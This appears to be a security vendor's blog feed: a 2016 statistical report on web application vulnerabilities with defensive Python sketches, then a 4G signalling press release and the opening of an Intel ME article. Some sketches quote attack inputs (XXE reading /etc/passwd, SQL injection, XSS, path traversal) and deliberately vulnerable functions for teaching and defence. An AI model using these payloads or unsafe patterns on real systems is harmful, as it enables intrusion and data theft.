Server-Side Request Forgery is a vulnerability that allows an attacker to make the web application send arbitrary HTTP requests on its behalf. The application accepts a URL or an HTTP message and performs insufficient checks on the destination before sending the request. An attacker can exploit this to send requests to servers with restricted access (for example, computers on a LAN), which can result in disclosure of confidential data, access to application source code, DoS attacks, and other problems. For example, an attacker can obtain information about the structure of network segments that are not available to external users, access local resources, and scan ports (services).
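The defensive counterpart is a destination check performed after name resolution. A sketch under simplified assumptions: the resolved address is passed in explicitly to stand in for a real DNS lookup, and only a few well-known private ranges are blocked:

```python
import ipaddress
from urllib.parse import urlparse

PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                 "127.0.0.0/8", "169.254.0.0/16")]

def destination_allowed(url: str, resolved_ip: str) -> bool:
    """Reject non-HTTP schemes and any request whose resolved address
    lands inside private, loopback, or link-local ranges."""
    if urlparse(url).scheme not in ("http", "https"):
        return False
    addr = ipaddress.ip_address(resolved_ip)
    return not any(addr in net for net in PRIVATE_NETS)

print(destination_allowed("https://example.com/img", "93.184.216.34"))  # True
print(destination_allowed("http://intranet/", "192.168.1.5"))           # False
print(destination_allowed("file:///etc/passwd", "127.0.0.1"))           # False
```

A full defense also has to handle redirects and DNS rebinding, which this sketch ignores.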
Clickjacking is a kind of attack on users involving visual deception. In essence, a vulnerable application is loaded in a frame on the application page and is disguised as a button or another element. By clicking this element, a user performs the attacker-chosen action in the context of that website. The vulnerability that makes this attack possible occurs when the application does not return an X-Frame-Options header and therefore allows showing the application in frames. In some browsers, this vulnerability also allows performing a Cross-Site Scripting attack.
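Checking a response for this flaw is a simple predicate over its headers. This sketch also treats the CSP frame-ancestors directive as adequate protection, a modern alternative the report does not mention:

```python
def frameable(headers: dict[str, str]) -> bool:
    """A page is clickjacking-prone if it sets neither X-Frame-Options
    nor a frame-ancestors directive in Content-Security-Policy."""
    lower = {k.lower(): v for k, v in headers.items()}
    if "x-frame-options" in lower:
        return False
    return "frame-ancestors" not in lower.get("content-security-policy", "")

print(frameable({"Content-Type": "text/html"}))      # True
print(frameable({"X-Frame-Options": "SAMEORIGIN"}))  # False
```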
Our report includes only code and configuration vulnerabilities. Other widespread security weaknesses, such as flaws in the software update management process, were not considered.
The severity of vulnerabilities was calculated in accordance with the Common Vulnerability Scoring System (CVSS v. 3). Based on the CVSS score, our experts assigned vulnerabilities one of three severity levels: high, medium, or low.
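The mapping from a CVSS v3 base score to the report's three levels can be sketched as follows. The cut-off values are the common CVSS v3 qualitative bands and are our assumption, since the report does not state them:

```python
def severity(cvss_base_score: float) -> str:
    """Collapse a CVSS v3 base score into high / medium / low
    (assumed cut-offs: >= 7.0 high, >= 4.0 medium, else low)."""
    if not 0.0 <= cvss_base_score <= 10.0:
        raise ValueError("CVSS base score must be in [0.0, 10.0]")
    if cvss_base_score >= 7.0:
        return "high"
    if cvss_base_score >= 4.0:
        return "medium"
    return "low"

print(severity(9.8))  # high
print(severity(5.4))  # medium
```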
2. Executive summary
All web applications analyzed have vulnerabilities.
Security flaws were found in all the applications analyzed, and 58 percent had at least one high-severity vulnerability. At the same time, we see a positive trend: the share of websites with high-severity vulnerabilities decreased by 12 percentage points compared with 2015.
Application users are not protected.
Most applications allow attacks on their users. Moreover, a number of applications provide insufficient protection of user data. For instance, we gained access to personal data in 20 percent of the applications that process user information, including bank and government websites.
Leaks are still a pressing problem.
Approximately half of web applications are exposed to leaks of critical data, including source code and personal data. 63 percent of web applications disclose the versions of software in use.
Web application vulnerabilities are an easy vector for LAN penetration.
One in every four web applications allows attacks on LAN resources. For example, an attacker can access files, scan hardware on the LAN, or attack network resources. Moreover, one out of every four applications was vulnerable to SQL Injection (high severity), which allows attackers to access the application database. This vulnerability could also allow an attacker to read arbitrary files or create new ones, as well as launch DoS attacks.
Manufacturing companies are the most vulnerable.
Almost half of manufacturing web applications received the lowest grade possible. The majority of web applications in all industries—with the exception of finance—were exposed to high-severity vulnerabilities. In finance, "only" 38 percent of applications had high-severity vulnerabilities.
64 percent of ASP.NET applications contain high-severity vulnerabilities.
Additionally, approximately one out of every two PHP and Java applications contains high-severity vulnerabilities. PHP applications were particularly affected, with an average of 2.8 high-severity vulnerabilities per application.
Production systems are more vulnerable than test applications.
In 2016, production systems turned out to be less protected. During manual testing, high-severity vulnerabilities were found on 50 percent of testbeds and on 55 percent of production systems. The number of high- and medium-severity vulnerabilities per application on production systems was twice as high compared to test systems.
Source code analysis is more effective than black-box testing.
Manual analysis of source code enabled our experts to detect high-severity vulnerabilities in 75 percent of applications. Black-box testing revealed such vulnerabilities on only 49 percent of web applications.
Automated testing is a fast way to find vulnerabilities.
Automated analysis of source code found an average of 4.6 high-severity, 66.9 medium-severity, and 45.9 low-severity vulnerabilities per application. Source-code analysis with the help of automated tools can identify all exit points—in other words, all possible exploits for each vulnerability—reliably and rapidly.
3. Participant portrait
The applications represent companies from a wide array of industries, including finance, government, media, telecoms, manufacturing, and e-commerce.
Figure 1. Participant portrait
Almost two thirds of these applications (65%) were production sites (in other words, currently operating and available to users).
Figure 2. Production and test systems
This year, PHP and Java were the most common development languages used. The proportion of ASP.NET applications increased year-over-year. Development languages in the "Other" category (Ruby, Python, etc.) accounted for only 7 percent.
Figure 3. Web application development tools
4. Trends
All web applications, whether examined using manual or automated security assessment tools, contained vulnerabilities with various severity levels. Only 1 percent of applications had solely low-severity vulnerabilities. We can see some improvement in the percentage of applications with high-severity vulnerabilities, which fell from 70 percent in 2015 to 58 percent in 2016. This improvement is partially driven by the fact that companies took account of last year's security findings when developing new web applications, and, perhaps most importantly, concentrated on remediating high-severity vulnerabilities.
Figure 4. Percentage of web applications whose worst vulnerabilities were of high, medium, or low severity
In general, we observed a discouraging trend in high-severity vulnerabilities during the three previous research periods. But growth in these vulnerabilities slowed down in 2015, and finally in 2016 they actually fell. Still, critical flaws were found in more than half of applications.
Medium-severity vulnerabilities were detected in almost all applications. Every year, this percentage is consistently in the range of 90 to 100 percent. The percentage of web applications with low-severity vulnerabilities increased.
Figure 5. Websites by vulnerability severity
5. Manual web application security testing
Out of all vulnerabilities detected by manual testing, the majority (81%) were of medium severity, with one tenth being of high severity. Compared to 2015, the share of high-severity vulnerabilities substantially decreased, but this is explained by the fact that in 2016 far more medium-severity vulnerabilities per application were detected.
Figure 6. Vulnerabilities by severity (results of manual analysis)
Security flaws were found in all web applications. Manual testing uncovered high-severity vulnerabilities in more than half of analyzed applications (54%), 44 percent of applications contained medium- and low-severity vulnerabilities, and a mere 2 percent of applications had only low-severity vulnerabilities.
Figure 7. Web applications by maximum vulnerability severity (results of manual analysis)
On average, manual analysis found 17 medium-severity, 2 high-severity, and 2 low-severity vulnerabilities per application.
Figure 8. Average number of vulnerabilities per application (results of manual analysis)
5.1. Most common vulnerabilities
In 2016, half of the top 10 vulnerabilities allowed performing attacks against web application users.
Figure 9. Most common vulnerabilities detected by manual testing (percentage of web applications)
As in 2015, Cross-Site Scripting (medium severity) tops the list and was found in 75 percent of the web applications examined. Successful exploitation of this vulnerability could allow an attacker to inject arbitrary HTML tags and JavaScript scripts into a browser session, obtain a session ID, conduct phishing attacks, and more.
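The standard remediation for Cross-Site Scripting is contextual output encoding of user-supplied data. A minimal sketch using the standard library (the wrapper element and input are illustrative):

```python
import html

def render_comment(user_input: str) -> str:
    """Escape user-supplied text before embedding it in an HTML page, so
    injected tags render as inert text instead of executing."""
    return "<p>" + html.escape(user_input, quote=True) + "</p>"

print(render_comment("<script>alert(document.cookie)</script>"))
# <p>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</p>
```

This covers HTML body context only; attribute, URL, and JavaScript contexts each need their own encoding rules.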
Similarly to past years, Positive Technologies used its information on attacks against web applications to create a list of the most common attacks. Sources of data are pilot projects involving deployment of PT Application Firewall. To hack a website or attack its users, attackers try to exploit various vulnerabilities in web application design and administration. Research revealed that 58 percent of applications that took part in pilot projects underwent attempts to attack users with Cross-Site Scripting—the most common vulnerability in this year's rating.
Figure 10. Cross-Site Scripting attack attempts (percentage of web applications)
Flaws leading to disclosure of information about the current software version (Fingerprinting) were found in 63 percent of applications, taking second place. In addition, more than half of web applications (54%) are vulnerable to Information Leakage, such as of source code and personal data.
Third place went to poor or non-existent protection against brute-force attacks. The percentage of applications with this flaw increased by 10 percentage points year-over-year.
Insufficient Session Security and Clickjacking took the next two places in our top 10 list. These categories made their first appearance in 2016, so no comparison with the previous year is possible. While developers became more careful about eliminating high-severity vulnerabilities that threaten application owners, flaws causing damage to users took center stage this year. Vulnerabilities to Cross-Site Request Forgery, which also allows attacks on users, were detected in 35 percent of web applications.
As already mentioned, the total share of websites containing high-severity vulnerabilities has fallen, and only one high-severity vulnerability—SQL Injection—made the top 10 this year, yet still it was found in 25 percent of web applications. According to our research, this vulnerability was the most commonly exploited one in 2016: attackers attempted to exploit it in 84 percent of web applications.
Figure 11. SQL Injection attack attempts (percentage of web applications)
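The root cause of SQL Injection is concatenation of untrusted input into query strings; the fix is parameter binding. A sketch against an in-memory SQLite table (the schema and data are illustrative):

```python
import sqlite3

def find_user(conn: sqlite3.Connection, username: str) -> list[tuple]:
    """Bound parameters keep user input as data, never as SQL syntax."""
    cur = conn.execute("SELECT id, name FROM users WHERE name = ?", (username,))
    return cur.fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO users (name) VALUES ('alice')")

print(find_user(conn, "alice"))        # [(1, 'alice')]
print(find_user(conn, "' OR '1'='1"))  # [] -- the injection payload stays inert
```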
Client-side vulnerabilities were detected in 59 percent of all applications examined in 2016. Among these vulnerabilities are Cross-Site Scripting, Cross-Site Request Forgery, session security flaws, and other security problems that make it possible to attack web application users. The remaining 41 percent of detected vulnerabilities, such as Information Leakage and Insufficient Authorization, are on the server side.
Figure 12. Vulnerabilities by attack target
Most of the vulnerabilities detected (73%) were found in software code and are connected with development mistakes—such as SQL Injection. Misconfiguration of web servers is responsible for about a quarter of all security flaws.
Figure 13. Vulnerability types
5.2. Analysis of threats and security levels
We graded web application security based on the possible consequences of exploitation of the vulnerabilities that we found, from "extremely poor" to "acceptable." An extremely poor security level means high-severity vulnerabilities that, for example, allow an external attacker to perform OS Commanding or lead to disclosure of sensitive information. In general, if a web application has vulnerabilities of high severity, its security level varies from "extremely poor" to "below average."
The overall level of web application security is still rather low. Experts rated the security of 16 percent of web applications as extremely poor.
One in every three examined web applications (32%) is characterized by a poor security level. Only 5 percent of applications are sufficiently protected.
Figure 14. Web application security level
The lowest grades ("poor" and "extremely poor") in 2016 went to applications used by online stores, manufacturers, and telecommunications companies: more than half of them had poor or extremely poor security. More than a third of e-commerce (34%) and manufacturing (43%) web applications received the lowest grade possible, "extremely poor." The security of financial and governmental applications is marginally better. Only 15 percent of telecom web applications could boast of acceptable security. The sample size for media applications was insufficient for drawing conclusions.
Figure 15. Web application security grade (by industry)
In 2016, the most widespread threat was attacks on web application users: such attacks are possible in nearly all web applications (94%). As mentioned in the previous section, a quarter of web applications contain vulnerabilities that can give an attacker access to databases. The same share of web applications (25%) can be a vector of penetration to a corporate LAN: these applications allow outsiders to scan hardware, learn about the network structure, and send requests to local nodes. About one in every five applications (19%) makes it possible to execute arbitrary OS commands on a server.
Note that DoS attacks were not attempted as part of application testing. Nevertheless, a number of applications had vulnerabilities that allow performing such attacks.
Figure 16. Most common threats
By and large, the vulnerabilities that enabled attacks on users were Cross-Site Scripting, Cross-Site Request Forgery, Open Redirect, Insecure Session, and Clickjacking. These development flaws are in this year's list of top 10 common vulnerabilities.
Figure 17. Vulnerabilities enabling attacks on users
An attacker can gain access to 70 percent of web applications. Such access is generally made possible by a weak password policy, absence of brute-force protection, and ability to conduct attacks on users.
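Brute-force protection can be as simple as throttling failed logins per account inside a sliding window. A sketch where the limits are arbitrary examples and time is passed in explicitly for clarity:

```python
from collections import defaultdict

class LoginThrottle:
    """Refuse further attempts once an account accumulates too many
    failures inside a sliding time window (sketch; limits are examples)."""

    def __init__(self, max_failures: int = 5, window_seconds: float = 300.0):
        self.max_failures = max_failures
        self.window = window_seconds
        self._failures: dict[str, list[float]] = defaultdict(list)

    def allow(self, username: str, now: float) -> bool:
        # Drop failures that have aged out of the window, then compare count
        recent = [t for t in self._failures[username] if now - t < self.window]
        self._failures[username] = recent
        return len(recent) < self.max_failures

    def record_failure(self, username: str, now: float) -> None:
        self._failures[username].append(now)

throttle = LoginThrottle()
for t in range(5):
    throttle.record_failure("alice", float(t))
print(throttle.allow("alice", 10.0))   # False: five recent failures
print(throttle.allow("alice", 400.0))  # True: the window has expired
```

A real deployment would persist the counters, throttle by source address as well, and add delays or CAPTCHAs rather than hard lockouts (which enable denial of service against users).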
The third and fourth places in our top 10 went to information leaks. Disclosure of information about the software version in use is a low-risk vulnerability, but in the case of outdated software, an attacker can take advantage of known vulnerabilities by using publicly available exploits.
By exploiting various vulnerabilities, we managed to obtain the source code of 8 percent of web applications. By analyzing source code, attackers can detect other vulnerabilities in a web application and advance an attack vector. Source code can contain sensitive information that enables access to critical resources.
Figure 18. Percentage of web applications in which access to source code was possible
Users' personal data is also under threat—attackers can gain access to 20 percent of web applications that process such data, including financial and governmental applications. Attackers can obtain information about users by taking advantage of an information leak or exploiting other vulnerabilities, such as SQL Injection.
Figure 19. Percentage of web applications in which users' personal data can be obtained
Reviewing critical threats by industry, we see that governmental, financial, and telecom applications contain the full range of high-severity vulnerabilities. Access to DBMS and OS Commanding threats are more common among e-commerce and manufacturing web applications.
Figure 20. Critical threats by industry
5.3. Statistics by industry
This section provides per-industry statistics on telecom, financial, e-commerce, governmental, and manufacturing web applications. Statistics for media applications are not given here, since the sample size was insufficiently large.
The majority of web applications in all industries—with the notable exception of finance—were exposed to high-severity vulnerabilities. High-severity vulnerabilities were found on the sites of 74 percent of telecoms, 67 percent of governmental institutions and online stores, and 57 percent of manufacturing companies. In finance, only 38 percent of applications had high-severity vulnerabilities.
Figure 21. Web applications by vulnerability severity
Medium-severity vulnerabilities were found in all examined web applications, with the exception of some telecom applications. The telecom industry was prone to contrasts: many applications had high-severity vulnerabilities, but at the same time, there was a small contingent of relatively well-secured web applications containing only minor flaws.
Figure 22. Web applications by maximum severity of vulnerabilities (percentage of applications)
Comparing web applications by their average number of vulnerabilities, governmental applications have more high-severity vulnerabilities than any other industry and rank first with 6.2 vulnerabilities per application. In 2015, this value was much smaller (0.7 vulnerabilities per web application). In previous years, security assessment was carried out only for important governmental web applications, for which security was one of the core development requirements. But now governments are broadening their attention to encompass existing web applications, including those with a rather low security level.
E-commerce web applications also have a large number of high-severity vulnerabilities. These web applications also have the highest rate of medium-severity vulnerabilities. On average, 39.3 vulnerabilities per application were detected in e-commerce applications, compared to 27.5 vulnerabilities in governmental applications.
About two high-severity vulnerabilities on average can be found per manufacturing or telecom application. The most secure are financial web applications, with only 0.8 high-severity vulnerabilities per application.
Figure 23. Average number of vulnerabilities per application by industry
In 2016, one of the most common high-risk vulnerabilities in web applications across all industries was SQL Injection. Other common vulnerabilities were XML External Entities, OS Commanding, and Path Traversal. Various telecom and financial applications contained all these flaws, but this may not necessarily be representative, since these industries also accounted for the majority of the dataset.
Figure 24. Percentage of websites with common vulnerabilities, by industry
5.4. Vulnerabilities in web applications by development tools
As in 2015, all examined applications, regardless of the development tool used, contained at least medium-level vulnerabilities. Statistics are given for PHP, Java, and ASP.NET applications. Applications written in other, less common languages were too few to provide meaningful statistics. However, almost all applications written in less common languages contained high-severity vulnerabilities, and in just one case were there only low-severity vulnerabilities.

Figure 25. Web applications by maximum vulnerability severity
The choice of PHP versus Java for development had virtually no effect on the severity of application vulnerabilities in 2016. All applications had medium-severity vulnerabilities, and more than half contained high-severity vulnerabilities.
The highest rate of high-severity vulnerabilities was observed among ASP.NET applications, with 64 percent containing such vulnerabilities. As compared to PHP and Java, the percentage of ASP.NET applications with medium-severity and low-severity vulnerabilities is slightly lower: 93 and 50 percent respectively. However, the average ASP.NET application had fewer high-severity vulnerabilities than its PHP and Java counterparts.
Figure 26. Web applications with vulnerabilities of various severity levels
As mentioned previously, the number of high-severity vulnerabilities has fallen significantly compared to previous years. On average, we see about two high-severity vulnerabilities per application, with PHP applications having the highest number (2.8). The number of medium-severity vulnerabilities, by contrast, increased compared to 2015 (for PHP and Java), with Java applications containing twice as many vulnerabilities of this level as other applications.
Figure 27. Average number of vulnerabilities per application, by development tools
The table includes statistics on the frequency of common vulnerabilities among resources developed with different tools.
Table 1. Most common vulnerabilities by development platform
The most common vulnerability in all applications was Cross-Site Scripting. More than 60 percent of applications, across all programming languages, were vulnerable to it. Security flaws related to Information Disclosure are also common: Information Leakage and Fingerprinting.
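The audited applications' code cannot be shown here, but the mechanics of Cross-Site Scripting are simple enough to sketch. The following is a minimal, hypothetical Python example (the function names and payload are invented for illustration, not taken from the tested applications):

```python
import html

def render_greeting_unsafe(name):
    # Vulnerable: user input lands in the page verbatim, so a value of
    # "<script>...</script>" executes in the visitor's browser
    return "<p>Hello, " + name + "!</p>"

def render_greeting_safe(name):
    # Encoding HTML metacharacters neutralizes the payload
    return "<p>Hello, " + html.escape(name) + "!</p>"

payload = "<script>alert(1)</script>"
unsafe_page = render_greeting_unsafe(payload)  # script tag survives intact
safe_page = render_greeting_safe(payload)      # rendered as harmless text
```

Context-aware output encoding at every point where user input enters the page is the standard defense against this class of flaw.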
Compared to 2015, PHP and Java applications had fewer high-severity vulnerabilities. For example, Path Traversal, which was common in previous years, did not make the top 10 this year.
Nevertheless, 26 to 29 percent of applications in each category are vulnerable to SQL Injection, more than a quarter of PHP applications (26%) are vulnerable to OS Commanding, and one of the most common vulnerabilities for all other development tools is XML External Entities.
Regardless of development tool or language, however, applications across the board were generally exposed to common vulnerabilities, as shown in the following figures.
Figure 28. Applications with the most common vulnerabilities, by development tool (part 1)
Figure 29. Applications with the most common vulnerabilities, by development tool (part 2)
5.5. Vulnerabilities in test and production applications
In 2016, production systems proved more vulnerable than test systems. High-severity vulnerabilities were found on 50 percent of testbeds and on 55 percent of production systems.

Figure 30. Systems by maximum vulnerability severity (percentage of systems)
Moreover, the number of high- and medium-severity vulnerabilities per application on production systems was twice as high compared to test systems. One explanation is that security-conscious companies (which test applications at the development stage, among other things) are better at avoiding vulnerabilities. Another reason is that deployment and implementation are complicated processes in their own right, and the added complexity can introduce new flaws. Some vulnerabilities can be detected only on a fully configured and ready-to-use system.
Figure 31. Web applications with various vulnerability severity levels
Figure 32. Average number of vulnerabilities per system
These results demonstrate the need to implement application security processes throughout the entire software lifecycle—from design and development to deployment and operation.
5.6. Comparison of test techniques: black box, gray box, and white box
Manual security analysis enabled our experts to apply black-, gray-, and white-box testing methods. A head-to-head comparison of these methods is impossible, since different methods were applied to different web applications, but we can look at the results to make a general assessment of test technique effectiveness. Most web applications (81%) were analyzed using black- and gray-box testing, without any access to the source code.

Figure 33. Applications by test technique used
White-box testing, with analysis of source code, enabled our experts to detect high-severity vulnerabilities in 75 percent of applications. Black-box testing, meaning that our testers did not receive source code or other key information, revealed such vulnerabilities in only 49 percent of web applications. Medium-severity vulnerabilities were found in practically all applications: 98 percent by black-box testing, and 92 percent by analyzing source code. Thus, white-box analysis proved to be more effective in most cases. However, even an attacker who does not have prior information about a web application still has a good chance of finding a high-severity vulnerability.
In addition, attackers can obtain source code by exploiting various vulnerabilities, as already demonstrated above.
Also note that in black- and gray-box testing, the testers were careful to avoid impacting application performance or causing denial of service. But real attackers are unlikely to be so considerate.
Figure 34. Percentage of web applications with vulnerabilities of a given category (by testing technique)
On average, Positive Technologies detected 2.8 high-severity vulnerabilities per application when analyzing source code (white box), and 1.9 vulnerabilities per application without source code (black box). The difference between these two figures is not so dramatic compared to the previous period, because many of the same companies had learned valuable lessons from the prior year's testing. White-box testing is highly effective, as can be confirmed by the automated testing results provided in the following section.
Moreover, white-box testing detected three times more low-severity vulnerabilities than black-box testing. There was a minimal difference in the number of medium-severity vulnerabilities detected using the various techniques.
Figure 35. Average number of vulnerabilities per application (by testing technique)
As in previous years, white-box testing detected more high-severity vulnerabilities. For example, analysis of source code revealed XML External Entity issues four times more often than black-box testing did. Insufficient Session Security, Cross-Site Request Forgery, and Open Redirect were detected primarily with the help of white-box testing.
Figure 36. Average number of certain vulnerabilities per application by testing technique
6. Automated security assessment
This section considers web applications that were subjected to analysis using an automated source code analyzer. Since manual and automated techniques were used on different web applications, same-application comparison of the results is not possible. Instead, we can consider the averages of the results obtained by these two different methods.

All applications analyzed here were pre-production, and some of them were at an early development stage. The vulnerabilities detected by automated scanning and represented in the statistics were confirmed manually using testbeds.
The vulnerability classification given here is the same as that used by the automated security scanner. It differs from the WASC classification in its more detailed breakdown of weaknesses, which the WASC classification combines into general categories such as Application Misconfiguration and Improper Filesystem Permissions.
We observe some improvements compared to the 2015 results. Just over a quarter of vulnerabilities (28.5%) were of high severity, compared to 40.4 percent in the previous year. Similar to the situation with manual checks in the previous section, part of this change may be due to the fact that the prior year's testing inspired companies to be more careful with security during development.
Figure 37. Severity of vulnerabilities found (automated testing)
All examined applications had at least medium-severity vulnerabilities. As in 2015, high-severity vulnerabilities were found in the vast majority of applications (89%).
Figure 38. Web application distribution by maximum severity level (automated testing)
Medium-severity vulnerabilities were discovered in all examined web applications.
Figure 39. Web applications with vulnerabilities of various severity levels (automated testing)
Automated analysis of source code found an average of 4.6 high-severity, 66.9 medium-severity, and 45.9 low-severity vulnerabilities per application. Moreover, two of the examined applications had hundreds of high-severity vulnerabilities and around 2,000 medium-severity vulnerabilities, but these applications have been omitted here to prevent distortion of the results. At the same time, these values give an idea of the usability and effectiveness of automated analysis tools for improving the security of web applications. Source-code analysis, unlike black-box testing, can identify all exit points—in other words, all possible exploits for each vulnerability. This information is needed to ensure total elimination of vulnerabilities.
Figure 40. Average number of vulnerabilities found per application, by severity (results of automated analysis)
Figure 41. Example of Cross-Site Scripting detection
The code analyzer we used for testing can verify the vulnerabilities it finds by automatically generating exploits. In this example, the exploit was designed to send a request using the GET method.
The most common high-severity vulnerabilities were related to improper restrictions on file access. Almost half of the web applications allow creating and modifying arbitrary files, which enables execution of OS commands—for example, if an attacker creates a PHP file. In almost all of these applications, such flaws exist together with Arbitrary File Reading/Removal vulnerabilities. An example of one such vulnerability in source code is shown in the following screenshot. The vulnerability allows an attacker to perform Path Traversal attacks and read arbitrary files on the server.
Figure 42. Example of Arbitrary File Reading detection
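The screenshots themselves cannot be reproduced here, but the pattern behind Path Traversal can be sketched. The following hypothetical Python fragment (the directory and function names are invented for illustration) contrasts naive path joining with canonicalization and a containment check:

```python
import os

BASE_DIR = "/var/www/uploads"  # hypothetical document root

def resolve_path_unsafe(filename):
    # Vulnerable: a filename like "../../etc/passwd" escapes
    # BASE_DIR entirely after the join
    return os.path.join(BASE_DIR, filename)

def resolve_path_safe(filename):
    # Canonicalize both paths and refuse anything outside BASE_DIR
    base = os.path.realpath(BASE_DIR)
    full = os.path.realpath(os.path.join(BASE_DIR, filename))
    if not full.startswith(base + os.sep):
        raise ValueError("path traversal attempt blocked")
    return full
```

The key point is that the check must run on the canonicalized path; filtering the raw input string for ".." sequences alone is easy to bypass with encoding tricks.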
The source code of a number of web applications had a high-severity SQL Injection vulnerability related to insufficient input filtering. This vulnerability allows attackers to retrieve information from the database. In some cases, an attacker could read arbitrary files, create new ones, and conduct DoS attacks. The following screenshot provides an example of a vulnerability detected by the analyzer and a test exploit that proves the vulnerability's exploitability.
Figure 43. Example of SQL Injection detection
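The contrast between string concatenation and parameterized queries that underlies this finding can be sketched in a few lines. A hypothetical Python/SQLite example (the table and data are invented for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (login TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def find_user_unsafe(login):
    # Vulnerable: input is concatenated into the SQL statement, so
    # login = "x' OR '1'='1" rewrites the WHERE clause and returns
    # every row in the table
    query = "SELECT login FROM users WHERE login = '%s'" % login
    return conn.execute(query).fetchall()

def find_user_safe(login):
    # Parameterized query: the driver treats input strictly as data
    return conn.execute(
        "SELECT login FROM users WHERE login = ?", (login,)
    ).fetchall()

leaked = find_user_unsafe("x' OR '1'='1")  # returns all users
empty = find_user_safe("x' OR '1'='1")     # returns nothing
```

Parameterized queries (or an equivalent prepared-statement mechanism) address the root cause, whereas ad hoc input filtering tends to miss edge cases.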
High-severity XML External Entity vulnerabilities were less common this year but not unheard of. They allow attackers to read arbitrary files or target corporate LAN resources. An example of this vulnerability is shown in the following screenshot.
Figure 44. Example of XXE detection
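As an illustration of why the choice of parser matters here, the textbook XXE payload can be fed to Python's standard library parser (the payload below is the classic example, not one taken from the audited applications):

```python
import xml.etree.ElementTree as ET

# Classic XXE payload: an external entity pointing at a local file
payload = """<?xml version="1.0"?>
<!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>"""

try:
    ET.fromstring(payload)
    expanded = True
except ET.ParseError:
    # Python's expat-based parser does not resolve external entities,
    # so the &xxe; reference is rejected as undefined
    expanded = False
```

A parser configured to resolve external entities would instead substitute the contents of /etc/passwd into the document, which is exactly the behavior behind the vulnerabilities described above; disabling DTD and external entity processing is the standard mitigation.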
Automated analysis revealed many other flaws in the source code of the examined applications: a hard-coded password, one-way unsalted hash function, and static random number generator were among the findings.
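The unsalted-hash finding in particular is easy to illustrate. The following hypothetical Python sketch contrasts a bare SHA-256 digest with a salted, iterated PBKDF2 digest (the iteration count and salt size are chosen for illustration only):

```python
import hashlib
import os

def hash_password_weak(password):
    # One-way but unsalted: identical passwords produce identical
    # digests, so precomputed (rainbow) tables apply directly
    return hashlib.sha256(password.encode()).hexdigest()

def hash_password_salted(password, salt=None):
    # A per-user random salt plus key stretching makes each digest
    # unique and brute force far more expensive
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest
```

With the weak scheme, two users sharing a password share a digest; with the salted scheme, the stored salt is needed to reproduce the digest at login time.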
Overall, the results confirm that web application security assessment must be implemented throughout the entire software lifecycle. Automated source code testing allows identifying the maximum number of coding errors in the shortest possible time, including critical mistakes causing high-severity threats, which if left unfixed can provide a tempting target for attackers.
Conclusions
Although the percentage of web applications with high-severity vulnerabilities improved year-over-year, overall security remains weak. More than 50 percent of web applications have high-severity vulnerabilities, and this value rises sharply if an attacker has access to source code. By exploiting the vulnerabilities we detected, attackers could obtain large amounts of sensitive information including application source code and users' personal data, even from the websites of banks and government institutions. Users cannot rest easy: almost all applications can be exploited by attackers to target users.

We also found that web application vulnerabilities are the easiest way to penetrate the corporate LAN. About a quarter of the tested websites could be used by attackers to attack internal company systems.
Source-code analysis is much more effective than methods without access to the application code. Moreover, performing such code analysis during development significantly improves the security of the final application. Automated tools for source-code analysis should be used at multiple stages of development, because analyzers are much quicker than manual analysis.
We found that production web applications were more vulnerable than test applications. This underscores the need to perform security analysis not only during development, but when an application is already in production. Preventive protection measures, in the form of a web application firewall (WAF), are essential for keeping production systems safe.
Despite the modest improvements seen in 2016, web application security clearly still requires more attention. The results demonstrate the need to implement application security processes throughout the entire software lifecycle, both on the part of developers and system administrators responsible for secure operation. Only comprehensive security measures—including secure development procedures, preventive protection, and regular web application security testing—can minimize risks and provide a strong level of security.
↧
4G Networks Infrastructure Still Vulnerable Despite Upgrade
Billions have been invested and super speeds reached, yet none of the security holes have been fixed. Positive Technologies has warned that its research confirms vulnerabilities in the world's mobile infrastructure still exist, despite the billions invested to upgrade mobile networks to Diameter to carry 4G and 5G traffic. The unaddressed flaws leave mobile communications, and the security practices founded on them, vulnerable: hackers can intercept and divert SMS messages, including passcodes meant to validate identity and authorise transactions; eavesdrop on phone conversations; locate users; launch denial of service attacks against the whole network; and carry out other illegitimate actions. Earlier this year, attackers stole funds from bank accounts in Germany by redirecting one-time passcodes (OTPs) sent by banks via text message (SMS), confirming that real-world attacks have been devised and can be executed successfully.
“The mobile network infrastructure is based on a set of telephony signalling protocols, developed in 1975, when security wasn’t a consideration but was less of a risk as only a few people had access. Today that’s no longer true. Access has spiralled yet security is still non-existent,” explains Michael Downs, Director of Telecoms Security (EMEA) of Positive Technologies. “With Diameter [the new protocol for 4G and 5G networks] used to support thousands of emerging IoT applications – from cars to connected cities, these lax security practices leave us all vulnerable as hackers can easily exploit these flaws.”
Earlier this year it was confirmed that attackers in Germany had accessed the global mobile infrastructure and diverted one-time passcodes sent from banks, via SMS message, to authorise transactions and steal money out of compromised accounts. Speaking about this development Michael adds, “This incident shows that these vulnerabilities in the mobile infrastructure open mobile users to the same kind of mass cybercrime threats that Internet users have suffered for years. There’s zero security, with zero control, which equals zero trust. Networks must accept the threat, educate themselves about the attack vectors being used and move to monitor and neutralise the problem. In the meantime, given it’s been proven fallible, using mobile channels as an additional layer of security has to be paused.”
In August 2016, NIST stopped recommending two-factor authentication systems that use SMS, deprecating what it described as out-of-band verification via SMS. US Senator Ron Wyden (D-OR) and Representative Ted Lieu (D-CA) have both written to America's communications watchdog, the FCC, asking why reported flaws in global SS7 cell networks have not been addressed.
Positive Technologies has published a whitepaper detailing its findings: https://www.ptsecurity.com/ww-en/premium/diameter-research/
↧
Disabling Intel ME 11 via undocumented mode
Our team of Positive Technologies researchers has delved deep into the internal architecture of Intel Management Engine (ME) 11, revealing a mechanism that can disable Intel ME after hardware is initialized and the main processor starts. In this article, we describe how we discovered this undocumented mode and how it is connected with the U.S. government's High Assurance Platform (HAP) program.
Disclaimer: The methods described here are risky and may damage or destroy your computer. We take no responsibility for any attempts inspired by our work and do not guarantee the operability of anything. For those who are aware of the risks and decide to experiment anyway, we recommend using an SPI programmer.
Introduction
